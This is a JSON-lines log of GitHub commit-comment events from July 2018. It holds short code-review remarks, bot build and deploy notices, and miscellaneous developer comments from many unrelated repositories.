{"id":"7965944972","type":"CommitCommentEvent","actor":{"login":"hackleberryfinn"},"repo":{"name":"hackleberryfinn/Global-Citizen-Hackleberry-Finn"},"payload":{"comment":{"id":29709667,"position":null,"line":null,"path":null,"commit_id":"f4b008cb9ff419b8688c3c988f0ca024177b0865","created_at":"2018-07-14T15:31:55Z","updated_at":"2018-07-14T15:31:55Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/f3f56358-197d-4212-bb99-0d95d54bfc86?env_id=ibm%3Ayp%3Aus-south \"Global-Citizen-Hackleberry-Finn\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/baf2eb90-00e5-408f-9f5d-d47769aab3be?env_id=ibm%3Ayp%3Aus-south \"Global-Citizen-Hackleberry-Finn\") deployed [Global-Citizen-Hackleberry-Finn](https://github.com/hackleberryfinn/Global-Citizen-Hackleberry-Finn/releases/tag/deploy-ibm-yp-us-south-luke.hutchinson-live.com.au-dev-20180714-153154 \"deploy-ibm-yp-us-south-luke.hutchinson-live.com.au-dev-20180714-153154\") to [dev](https://console.bluemix.net/apps/8b984503-074c-42ab-b13c-92e494596da3?env_id=ibm:yp:us-south \"ibm:yp:us-south:luke.hutchinson@live.com.au:dev\"), including this commit"}},"created_at":"2018-07-14T15:31:55Z"}
{"id":"7965948070","type":"CommitCommentEvent","actor":{"login":"lfuelling"},"repo":{"name":"tootsuite/mastodon"},"payload":{"comment":{"id":29709668,"position":4,"line":119,"path":"package.json","commit_id":"0eacf2b419fdb7e7abca9f38537a05f7d3b89bf2","created_at":"2018-07-14T15:34:15Z","updated_at":"2018-07-14T15:34:15Z","author_association":"CONTRIBUTOR","body":"is this intended?"}},"created_at":"2018-07-14T15:34:15Z"}
{"id":"7965949174","type":"CommitCommentEvent","actor":{"login":"denghong0401"},"repo":{"name":"denghong0401/myjavaprogrom"},"payload":{"comment":{"id":29709669,"position":null,"line":null,"path":null,"commit_id":"1ec519f128c1c4a519704aaeef8988ad0821dcb1","created_at":"2018-07-14T15:35:07Z","updated_at":"2018-07-14T15:35:07Z","author_association":"OWNER","body":"这个代码是错的，今天按到什么好相处了问题，后面那个Accounnt.java文件才是对的"}},"created_at":"2018-07-14T15:35:07Z"}
{"id":"7965950363","type":"CommitCommentEvent","actor":{"login":"wloot"},"repo":{"name":"wloot/device_xiaomi_msm8956-common"},"payload":{"comment":{"id":29709670,"position":null,"line":null,"path":null,"commit_id":"f8e10b4aef147c3dab67212c9744972778a3e056","created_at":"2018-07-14T15:36:02Z","updated_at":"2018-07-14T15:36:02Z","author_association":"OWNER","body":"https://source.android.com/devices/tech/perf/boot-times"}},"created_at":"2018-07-14T15:36:02Z"}
{"id":"7965951785","type":"CommitCommentEvent","actor":{"login":"shingoushori"},"repo":{"name":"shingoushori/simutrans"},"payload":{"comment":{"id":29709672,"position":null,"line":null,"path":null,"commit_id":"0e0c31d7f3dfc709cd5cc818c948c569d99537c8","created_at":"2018-07-14T15:37:08Z","updated_at":"2018-07-14T15:37:08Z","author_association":"OWNER","body":"↓here is the target commit of this bug fix\r\nhttps://github.com/shingoushori/simutrans/commit/3b50762b83dc1066f92065c6886460e470f661c8\r\n"}},"created_at":"2018-07-14T15:37:08Z"}
{"id":"7965954055","type":"CommitCommentEvent","actor":{"login":"shingoushori"},"repo":{"name":"shingoushori/simutrans"},"payload":{"comment":{"id":29709674,"position":null,"line":null,"path":null,"commit_id":"3b50762b83dc1066f92065c6886460e470f661c8","created_at":"2018-07-14T15:38:59Z","updated_at":"2018-07-14T15:38:59Z","author_association":"OWNER","body":"↓here is the necessary bug fix commit\r\nhttps://github.com/shingoushori/simutrans/commit/0e0c31d7f3dfc709cd5cc818c948c569d99537c8"}},"created_at":"2018-07-14T15:38:59Z"}
{"id":"7965954212","type":"CommitCommentEvent","actor":{"login":"UlissesMartins"},"repo":{"name":"UlissesMartins/Python3"},"payload":{"comment":{"id":29709675,"position":null,"line":null,"path":null,"commit_id":"ee0cdbe94f0a6e41d81451433c0c485bf6bc3236","created_at":"2018-07-14T15:39:07Z","updated_at":"2018-07-14T15:39:07Z","author_association":"OWNER","body":"Ocorrências dentro de um texto"}},"created_at":"2018-07-14T15:39:07Z"}
{"id":"7965954380","type":"CommitCommentEvent","actor":{"login":"fichtner"},"repo":{"name":"opnsense/core"},"payload":{"comment":{"id":29709676,"position":21,"line":140,"path":"src/opnsense/mvc/app/library/OPNsense/Backup/Nextcloud.php","commit_id":"ec9c29184e929493010692c282a08d66b27d1276","created_at":"2018-07-14T15:39:15Z","updated_at":"2018-07-14T15:39:15Z","author_association":"MEMBER","body":"FYI, this won't opnsense-patch I guess"}},"created_at":"2018-07-14T15:39:15Z"}
{"id":"7965962561","type":"CommitCommentEvent","actor":{"login":"Srifrancis886"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":29709690,"position":19,"line":25,"path":"app/extensions/brave/locales/en-US/preferences.properties","commit_id":"c6e1e6dce01fb8d6307d41b598f3575ad4728412","created_at":"2018-07-14T15:45:23Z","updated_at":"2018-07-14T15:45:23Z","author_association":"NONE","body":"I really like this site "}},"created_at":"2018-07-14T15:45:23Z"}
{"id":"7965962776","type":"CommitCommentEvent","actor":{"login":"syberant"},"repo":{"name":"splintah/game-of-life"},"payload":{"comment":{"id":29709691,"position":null,"line":null,"path":null,"commit_id":"d99858567dad6dd122df02dcf16061506026b8b0","created_at":"2018-07-14T15:45:32Z","updated_at":"2018-07-14T15:45:32Z","author_association":"COLLABORATOR","body":"Performance sadly did deteriorate from 750.000 ns/iter to 810.000 ns/iter."}},"created_at":"2018-07-14T15:45:32Z"}
{"id":"7965964765","type":"CommitCommentEvent","actor":{"login":"Gargron"},"repo":{"name":"tootsuite/mastodon"},"payload":{"comment":{"id":29709694,"position":4,"line":119,"path":"package.json","commit_id":"0eacf2b419fdb7e7abca9f38537a05f7d3b89bf2","created_at":"2018-07-14T15:47:01Z","updated_at":"2018-07-14T15:47:01Z","author_association":"MEMBER","body":"https://github.com/tootsuite/mastodon/pull/8019#discussion_r202511100"}},"created_at":"2018-07-14T15:47:01Z"}
{"id":"7965964985","type":"CommitCommentEvent","actor":{"login":"victoriaogomes"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29709695,"position":null,"line":null,"path":null,"commit_id":"10e8d186b780aba87def7a5f427ec65ad9f9c905","created_at":"2018-07-14T15:47:10Z","updated_at":"2018-07-14T15:47:10Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Corrigir a pesquisa pela Categoria 7](https://trello.com/c/5uhpJaEZ/217-corrigir-a-pesquisa-pela-categoria-7)"}},"created_at":"2018-07-14T15:47:10Z"}
{"id":"7965965701","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29709696,"position":null,"line":null,"path":null,"commit_id":"d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b","created_at":"2018-07-14T15:47:44Z","updated_at":"2018-07-14T15:47:44Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2337 of 2337 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-14T15:47:44Z"}
{"id":"7965966313","type":"CommitCommentEvent","actor":{"login":"victoriaogomes"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29709698,"position":null,"line":null,"path":null,"commit_id":"82d296f3112fb85b2a4998d5d74d4155d6a8550a","created_at":"2018-07-14T15:48:13Z","updated_at":"2018-07-14T15:48:13Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Corrigir pesquisa de produtos por nome](https://trello.com/c/e2Ui8VOY/220-corrigir-pesquisa-de-produtos-por-nome)"}},"created_at":"2018-07-14T15:48:13Z"}
{"id":"7965966462","type":"CommitCommentEvent","actor":{"login":"Phylogeny"},"repo":{"name":"MrCrayfish/MrCrayfishVehicleMod"},"payload":{"comment":{"id":29709699,"position":null,"line":null,"path":null,"commit_id":"59ff9a2b797ec043d727dd5bebb3ff35f6f6a546","created_at":"2018-07-14T15:48:20Z","updated_at":"2018-07-14T15:48:20Z","author_association":"NONE","body":"Yeah, why do I do that... it kind of defeats the purpose of using the utility classes in the first place..."}},"created_at":"2018-07-14T15:48:20Z"}
{"id":"7965966735","type":"CommitCommentEvent","actor":{"login":"victoriaogomes"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29709700,"position":null,"line":null,"path":null,"commit_id":"fb27308a0c5a672c9d90ad3851ff5bcaba571a8e","created_at":"2018-07-14T15:48:32Z","updated_at":"2018-07-14T15:48:32Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Corrigir pesquisa de produtos por nome](https://trello.com/c/e2Ui8VOY/220-corrigir-pesquisa-de-produtos-por-nome)"}},"created_at":"2018-07-14T15:48:32Z"}
{"id":"7965967277","type":"CommitCommentEvent","actor":{"login":"victoriaogomes"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29709701,"position":null,"line":null,"path":null,"commit_id":"f7cecb5162ac73b4f4e75c34982403fff3df7385","created_at":"2018-07-14T15:48:59Z","updated_at":"2018-07-14T15:48:59Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Corrigir pesquisa de produtos por nome](https://trello.com/c/e2Ui8VOY/220-corrigir-pesquisa-de-produtos-por-nome)"}},"created_at":"2018-07-14T15:48:59Z"}
{"id":"7965967479","type":"CommitCommentEvent","actor":{"login":"qaisjp"},"repo":{"name":"multitheftauto/mtasa-blue"},"payload":{"comment":{"id":29709702,"position":null,"line":null,"path":null,"commit_id":"672da6b5692f7c6cd18994897b610ad272a856dc","created_at":"2018-07-14T15:49:09Z","updated_at":"2018-07-14T15:49:09Z","author_association":"MEMBER","body":"Won't build on x86 Linux. Need to investigate further and try more fixes out. Need to also reliably reproduce problem locally."}},"created_at":"2018-07-14T15:49:09Z"}
{"id":"7965969061","type":"CommitCommentEvent","actor":{"login":"PiggyPiglet"},"repo":{"name":"PiggyPiglet/TimeAPI"},"payload":{"comment":{"id":29709703,"position":null,"line":null,"path":null,"commit_id":"2f5127eab05cdba88c1fad64d4589a3ba471d8b6","created_at":"2018-07-14T15:50:17Z","updated_at":"2018-07-14T15:50:17Z","author_association":"OWNER","body":"I can't even remember if the way I used the api in a project of mine would be affected by this, I'll have to look into it. Thanks for letting me know though."}},"created_at":"2018-07-14T15:50:17Z"}
{"id":"7965969905","type":"CommitCommentEvent","actor":{"login":"wildtype"},"repo":{"name":"nsiregar/pegelinux"},"payload":{"comment":{"id":29709704,"position":null,"line":null,"path":null,"commit_id":"9061bbd4b7a1d2860ba82f847be7c9a71862c131","created_at":"2018-07-14T15:50:55Z","updated_at":"2018-07-14T15:50:55Z","author_association":"COLLABORATOR","body":"Why? :confused: "}},"created_at":"2018-07-14T15:50:55Z"}
{"id":"7965969979","type":"CommitCommentEvent","actor":{"login":"zixia"},"repo":{"name":"linyimin-bupt/wechaty-puppet-ioscat"},"payload":{"comment":{"id":29709705,"position":6,"line":14,"path":"src/config.ts","commit_id":"7973f38fb2176b4e3026025b4b856909f3a34b79","created_at":"2018-07-14T15:50:58Z","updated_at":"2018-07-14T15:50:58Z","author_association":"COLLABORATOR","body":"Should better to use a `enum` at here."}},"created_at":"2018-07-14T15:50:58Z"}
{"id":"7965972090","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29709707,"position":null,"line":null,"path":null,"commit_id":"d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b","created_at":"2018-07-14T15:52:29Z","updated_at":"2018-07-14T15:52:29Z","author_association":"NONE","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d4be3ff9e8ae2b8b28bc729f5fd8fc97afcb8f8b-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-14T15:52:29Z"}
{"id":"7965972382","type":"CommitCommentEvent","actor":{"login":"Nerd-Bear"},"repo":{"name":"DSM-DMS/DMS-Backend"},"payload":{"comment":{"id":29709708,"position":null,"line":null,"path":null,"commit_id":"4b9106a2ff9b9cf1d8a229a6b1f9f87b2d1c9a68","created_at":"2018-07-14T15:52:42Z","updated_at":"2018-07-14T15:52:42Z","author_association":"CONTRIBUTOR","body":"1. slack token은 이미 서버 환경변수에 저장이 되어있다.\r\n2. slack token이 서버 환경변수에 없다 한다면 다른 리스폰스 스테이터스를 고려할 필요가 있을 듯 하다"}},"created_at":"2018-07-14T15:52:42Z"}
{"id":"7965972794","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"SpongePowered/SpongeForge"},"payload":{"comment":{"id":29709709,"position":14,"line":135,"path":"src/main/java/org/spongepowered/mod/SpongeMod.java","commit_id":"e37fa119fa73a9a2819ad68a0d9ff8bb436f0459","created_at":"2018-07-14T15:53:02Z","updated_at":"2018-07-14T15:53:02Z","author_association":"NONE","body":"This typo blows my eyes somehow. Reported to #263"}},"created_at":"2018-07-14T15:53:02Z"}
{"id":"7965972879","type":"CommitCommentEvent","actor":{"login":"adelovelace"},"repo":{"name":"ceorellana/exploratorioIncognito"},"payload":{"comment":{"id":29709710,"position":1,"line":1,"path":"README.md","commit_id":"136ae6bffba92a4e55556fb939504235992338f5","created_at":"2018-07-14T15:53:07Z","updated_at":"2018-07-14T15:53:07Z","author_association":"COLLABORATOR","body":"# Análisis Exploratorio de Datos - Análisis de lenguajes de rogramación"}},"created_at":"2018-07-14T15:53:07Z"}
{"id":"7965972958","type":"CommitCommentEvent","actor":{"login":"MineClipper"},"repo":{"name":"MineClipper/Dyno-Custom-Commands"},"payload":{"comment":{"id":29709711,"position":null,"line":null,"path":null,"commit_id":"d5073c1cf5606f4b9f93439611e0496ea17a1b49","created_at":"2018-07-14T15:53:10Z","updated_at":"2018-07-14T15:53:10Z","author_association":"OWNER","body":"{delete}\r\n\r\nsorry forgot to add this on the last line"}},"created_at":"2018-07-14T15:53:10Z"}
{"id":"7965973044","type":"CommitCommentEvent","actor":{"login":"victoriaogomes"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29709712,"position":null,"line":null,"path":null,"commit_id":"a73808ae331de3449ddd032d646048d45717477f","created_at":"2018-07-14T15:53:14Z","updated_at":"2018-07-14T15:53:14Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Corrigir pesquisa de produtos por nome](https://trello.com/c/e2Ui8VOY/220-corrigir-pesquisa-de-produtos-por-nome)"}},"created_at":"2018-07-14T15:53:14Z"}
{"id":"7965973456","type":"CommitCommentEvent","actor":{"login":"Discostu36"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29709713,"position":16,"line":25361,"path":"languagetool-language-modules/de/src/main/resources/org/languagetool/resource/de/hunspell/spelling.txt","commit_id":"cba3a7f8c1c8888d9da6db44f51a5adcda9be201","created_at":"2018-07-14T15:53:31Z","updated_at":"2018-07-14T15:53:31Z","author_association":"CONTRIBUTOR","body":"*räusper* :-)"}},"created_at":"2018-07-14T15:53:31Z"}
{"id":"7965975282","type":"CommitCommentEvent","actor":{"login":"MNKCrypto"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29709715,"position":8,"line":9,"path":"contracts/Remittance.sol","commit_id":"83851eff021141ee64cc805769dd293aff11f161","created_at":"2018-07-14T15:54:59Z","updated_at":"2018-07-14T15:54:59Z","author_association":"OWNER","body":"since I am using exchange's address to derive the Payment Id,  I think there is no use to store exchange address in the structure. So removing it."}},"created_at":"2018-07-14T15:54:59Z"}
{"id":"7965976053","type":"CommitCommentEvent","actor":{"login":"MNKCrypto"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29709716,"position":55,"line":43,"path":"contracts/Remittance.sol","commit_id":"83851eff021141ee64cc805769dd293aff11f161","created_at":"2018-07-14T15:55:33Z","updated_at":"2018-07-14T15:55:33Z","author_association":"OWNER","body":"Yes. It is a paymentId. Have corrected it."}},"created_at":"2018-07-14T15:55:33Z"}
{"id":"7965976716","type":"CommitCommentEvent","actor":{"login":"VladislavMoldovan"},"repo":{"name":"pascalabcnet/pascalabcnet"},"payload":{"comment":{"id":29709717,"position":11,"line":16874,"path":"TreeConverter/TreeConversion/syntax_tree_visitor.cs","commit_id":"210fa46d3fa45c734420ba9e484662ddb2bc3f93","created_at":"2018-07-14T15:56:00Z","updated_at":"2018-07-14T15:56:00Z","author_association":"NONE","body":"Пожалуйста, сделайте без \"немного грубовато\", когда найдется время."}},"created_at":"2018-07-14T15:56:00Z"}
{"id":"7965978350","type":"CommitCommentEvent","actor":{"login":"MNKCrypto"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29709718,"position":56,"line":44,"path":"contracts/Remittance.sol","commit_id":"83851eff021141ee64cc805769dd293aff11f161","created_at":"2018-07-14T15:57:07Z","updated_at":"2018-07-14T15:57:07Z","author_association":"OWNER","body":"Have introduced a mapping for puzzle => uint. Now in createRemittance function I am validating whether the puzzle is already used."}},"created_at":"2018-07-14T15:57:07Z"}
{"id":"7965978829","type":"CommitCommentEvent","actor":{"login":"MNKCrypto"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29709719,"position":67,"line":53,"path":"contracts/Remittance.sol","commit_id":"83851eff021141ee64cc805769dd293aff11f161","created_at":"2018-07-14T15:57:29Z","updated_at":"2018-07-14T15:57:29Z","author_association":"OWNER","body":"Thanks for this input. Have corrected it."}},"created_at":"2018-07-14T15:57:29Z"}
{"id":"7965979591","type":"CommitCommentEvent","actor":{"login":"MNKCrypto"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29709720,"position":117,"line":89,"path":"contracts/Remittance.sol","commit_id":"83851eff021141ee64cc805769dd293aff11f161","created_at":"2018-07-14T15:58:05Z","updated_at":"2018-07-14T15:58:05Z","author_association":"OWNER","body":"This is a miss from my side. Have corrected it."}},"created_at":"2018-07-14T15:58:05Z"}
{"id":"7965979666","type":"CommitCommentEvent","actor":{"login":"Jackchows"},"repo":{"name":"Jackchows/Cangjie5"},"payload":{"comment":{"id":29709721,"position":115,"line":16259,"path":"Cangjie5.txt","commit_id":"8bee383b071ead9996e23fea9556049ebbc50b1a","created_at":"2018-07-14T15:58:08Z","updated_at":"2018-07-14T15:58:08Z","author_association":"OWNER","body":"或者可以這樣理解：\r\n無論 Unicode 有沒有收「卜戈」，本項目都收「卜戈」。Unicode 衹收了「大戈」的時候，本項目才收「大戈」。"}},"created_at":"2018-07-14T15:58:08Z"}
{"id":"7965980308","type":"CommitCommentEvent","actor":{"login":"MNKCrypto"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29709722,"position":122,"line":94,"path":"contracts/Remittance.sol","commit_id":"83851eff021141ee64cc805769dd293aff11f161","created_at":"2018-07-14T15:58:36Z","updated_at":"2018-07-14T15:58:36Z","author_association":"OWNER","body":"Have included contract address in this hash so that output will vary for each instance of the contract"}},"created_at":"2018-07-14T15:58:36Z"}
{"id":"7965981167","type":"CommitCommentEvent","actor":{"login":"AndroidToolsWu"},"repo":{"name":"AndroidToolsWu/AndroidToolsWu.github.io"},"payload":{"comment":{"id":29709724,"position":null,"line":null,"path":null,"commit_id":"b7fabec8d4f4522123ed43213b57738304e9704d","created_at":"2018-07-14T15:59:19Z","updated_at":"2018-07-14T15:59:19Z","author_association":"OWNER","body":"q"}},"created_at":"2018-07-14T15:59:19Z"}
{"id":"7965981707","type":"CommitCommentEvent","actor":{"login":"Jamesits"},"repo":{"name":"imbushuo/mac-precision-touchpad"},"payload":{"comment":{"id":29709725,"position":null,"line":null,"path":null,"commit_id":"a7a517a7dd0fc8975f72058786670c175316a39b","created_at":"2018-07-14T15:59:44Z","updated_at":"2018-07-14T15:59:44Z","author_association":"NONE","body":"━━━━━┒\r\n┓┏┓┏┓┃ \r\n┛┗┛┗┛┃＼ O／  I HAVE POTENTIAL!\r\n┓┏┓┏┓┃　/\r\n┛┗┛┗┛┃ノ)\r\n┓┏┓┏┓┃\r\n┛┗┛┗┛┃\r\n┓┏┓┏┓┃\r\n┛┗┛┗┛┃\r\n┓┏┓┏┓┃\r\n┛┗┛┗┛┃\r\n┓┏┓┏┓┃\r\n┃┃┃┃┃┃\r\n┻┻┻┻┻┻"}},"created_at":"2018-07-14T15:59:44Z"}
{"id":"7965985741","type":"CommitCommentEvent","actor":{"login":"os72"},"repo":{"name":"os72/protoc-jar-maven-plugin"},"payload":{"comment":{"id":29709732,"position":null,"line":null,"path":null,"commit_id":"2f0fb4ac1367d9871af0ea4985fc3bab72ce63aa","created_at":"2018-07-14T16:02:27Z","updated_at":"2018-07-14T16:02:27Z","author_association":"OWNER","body":"For issue #31 "}},"created_at":"2018-07-14T16:02:27Z"}
{"id":"7965987191","type":"CommitCommentEvent","actor":{"login":"jlaine"},"repo":{"name":"jlaine/aiortc"},"payload":{"comment":{"id":29709733,"position":null,"line":null,"path":null,"commit_id":"a9267730499738810d18f999d8e2ad1d2a3648d8","created_at":"2018-07-14T16:03:31Z","updated_at":"2018-07-14T16:03:31Z","author_association":"OWNER","body":"I have added a signaling.py in the other examples, could you make a copy of it and use that?\r\n\r\nAlso it would be nice if the example folder was \"datachannel-vpn\"\r\n"}},"created_at":"2018-07-14T16:03:31Z"}
{"id":"7965991999","type":"CommitCommentEvent","actor":{"login":"punoqun"},"repo":{"name":"GitBusting/CalendarApp"},"payload":{"comment":{"id":29709735,"position":null,"line":null,"path":null,"commit_id":"c9a93a57e3a3ff395826a3eb5196dc0d0773bb7a","created_at":"2018-07-14T16:07:05Z","updated_at":"2018-07-14T16:07:05Z","author_association":"CONTRIBUTOR","body":"#11 "}},"created_at":"2018-07-14T16:07:05Z"}
{"id":"7965992134","type":"CommitCommentEvent","actor":{"login":"punoqun"},"repo":{"name":"GitBusting/CalendarApp"},"payload":{"comment":{"id":29709736,"position":null,"line":null,"path":null,"commit_id":"ed26012a0b665ddc22f67504366d3f16a9ca876e","created_at":"2018-07-14T16:07:11Z","updated_at":"2018-07-14T16:07:11Z","author_association":"CONTRIBUTOR","body":"#11 "}},"created_at":"2018-07-14T16:07:11Z"}
{"id":"7965992241","type":"CommitCommentEvent","actor":{"login":"punoqun"},"repo":{"name":"GitBusting/CalendarApp"},"payload":{"comment":{"id":29709737,"position":null,"line":null,"path":null,"commit_id":"c8853b88aefb033bff9508a6ffe14c68d5f5fe48","created_at":"2018-07-14T16:07:16Z","updated_at":"2018-07-14T16:07:16Z","author_association":"CONTRIBUTOR","body":"#11 "}},"created_at":"2018-07-14T16:07:16Z"}
{"id":"7965992490","type":"CommitCommentEvent","actor":{"login":"punoqun"},"repo":{"name":"GitBusting/CalendarApp"},"payload":{"comment":{"id":29709738,"position":null,"line":null,"path":null,"commit_id":"f0ded7863a73955fdc52fc666164c40b5e3660f0","created_at":"2018-07-14T16:07:26Z","updated_at":"2018-07-14T16:07:26Z","author_association":"CONTRIBUTOR","body":"#11 "}},"created_at":"2018-07-14T16:07:26Z"}
{"id":"7965993367","type":"CommitCommentEvent","actor":{"login":"gkurmanova"},"repo":{"name":"gkurmanova/kokserek"},"payload":{"comment":{"id":29709739,"position":null,"line":null,"path":null,"commit_id":"7538f247724a13a6727006fedba610c9f23e3a12","created_at":"2018-07-14T16:08:04Z","updated_at":"2018-07-14T16:08:04Z","author_association":"OWNER","body":"Added configuration for SECRET_KEY"}},"created_at":"2018-07-14T16:08:04Z"}
{"id":"7965995763","type":"CommitCommentEvent","actor":{"login":"Lunatixz"},"repo":{"name":"Lunatixz/KODI_Addons"},"payload":{"comment":{"id":29709741,"position":21,"line":53,"path":"script.kodi.windows.update/default.py","commit_id":"0f0e0ccbb1a123f0d6b49bb66ca50608a2371bac","created_at":"2018-07-14T16:09:59Z","updated_at":"2018-07-14T16:09:59Z","author_association":"OWNER","body":"Thanks for pointing that out...This was my old solution before this PR was merged. https://github.com/xbmc/xbmc/pull/13806\r\n\r\nUnfortunately it's also platform detection; and most likely will raise issues with \"dual installation\" like yours. Any suggestion would be appreciated."}},"created_at":"2018-07-14T16:09:59Z"}
{"id":"7965997525","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/bzip2-feedstock"},"payload":{"comment":{"id":29709743,"position":null,"line":null,"path":null,"commit_id":"7f0ebf5e03baee5526f1d48e6782c611b7c20c02","created_at":"2018-07-14T16:11:21Z","updated_at":"2018-07-14T16:11:21Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @jlanga were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @jlanga were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-14T16:11:21Z"}
{"id":"7965997654","type":"CommitCommentEvent","actor":{"login":"ganqiang"},"repo":{"name":"ganqiang/GitHub-Library"},"payload":{"comment":{"id":29709744,"position":1,"line":1,"path":"GitHub命令（重要）.txt","commit_id":"373f5b9d57b82df174c3fcb52c40d25589b21abc","created_at":"2018-07-14T16:11:26Z","updated_at":"2018-07-14T16:11:26Z","author_association":"OWNER","body":"//打开计算机库\r\ncd /F/GitHubLibrary"}},"created_at":"2018-07-14T16:11:26Z"}
{"id":"7965999435","type":"CommitCommentEvent","actor":{"login":"hackleberryfinn"},"repo":{"name":"hackleberryfinn/Global-Citizen-Hackleberry-Finn"},"payload":{"comment":{"id":29709745,"position":null,"line":null,"path":null,"commit_id":"e3f69e6a5afaa01160d2258d759e1f2a0c599152","created_at":"2018-07-14T16:12:45Z","updated_at":"2018-07-14T16:12:45Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/f3f56358-197d-4212-bb99-0d95d54bfc86?env_id=ibm%3Ayp%3Aus-south \"Global-Citizen-Hackleberry-Finn\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/baf2eb90-00e5-408f-9f5d-d47769aab3be?env_id=ibm%3Ayp%3Aus-south \"Global-Citizen-Hackleberry-Finn\") deployed [Global-Citizen-Hackleberry-Finn](https://github.com/hackleberryfinn/Global-Citizen-Hackleberry-Finn/releases/tag/deploy-ibm-yp-us-south-luke.hutchinson-live.com.au-dev-20180714-161244 \"deploy-ibm-yp-us-south-luke.hutchinson-live.com.au-dev-20180714-161244\") to [dev](https://console.bluemix.net/apps/8b984503-074c-42ab-b13c-92e494596da3?env_id=ibm:yp:us-south \"ibm:yp:us-south:luke.hutchinson@live.com.au:dev\"), including this commit"}},"created_at":"2018-07-14T16:12:45Z"}
{"id":"7965999889","type":"CommitCommentEvent","actor":{"login":"ganqiang"},"repo":{"name":"ganqiang/GitHub-Library"},"payload":{"comment":{"id":29709746,"position":1,"line":1,"path":"GitHub命令（重要）.txt","commit_id":"373f5b9d57b82df174c3fcb52c40d25589b21abc","created_at":"2018-07-14T16:13:06Z","updated_at":"2018-07-14T16:13:06Z","author_association":"OWNER","body":"//打开计算机库\r\ncd /F/GitHubLibrary"}},"created_at":"2018-07-14T16:13:06Z"}
{"id":"7966003418","type":"CommitCommentEvent","actor":{"login":"fariouche"},"repo":{"name":"fariouche/rtl8812au-1"},"payload":{"comment":{"id":29709752,"position":null,"line":null,"path":null,"commit_id":"9175cd68dbf383f27a178b054ba3369e93d4a00b","created_at":"2018-07-14T16:15:47Z","updated_at":"2018-07-14T16:15:47Z","author_association":"OWNER","body":"no worries. There is only a few differences so it will be easy to pinpoint the issue by trial.\r\nI will check that after the week end"}},"created_at":"2018-07-14T16:15:47Z"}
{"id":"7966006281","type":"CommitCommentEvent","actor":{"login":"jvperrin"},"repo":{"name":"ocf/puppet"},"payload":{"comment":{"id":29709754,"position":4,"line":14,"path":"modules/ocf_mesos/manifests/master/load_balancer/http_vhost.pp","commit_id":"74297fc39f7c32e976892a410486180045a832ac","created_at":"2018-07-14T16:18:04Z","updated_at":"2018-07-14T16:18:04Z","author_association":"MEMBER","body":"Maybe, I removed it because nothing was using it and because I don't really see a situation where you would want to specify just a subset of domains to use with SSL, but maybe there's some case in which this would be necessary. Anyway, I figure if that's ever the case then some feature like this can be readded to enable that behavior."}},"created_at":"2018-07-14T16:18:04Z"}
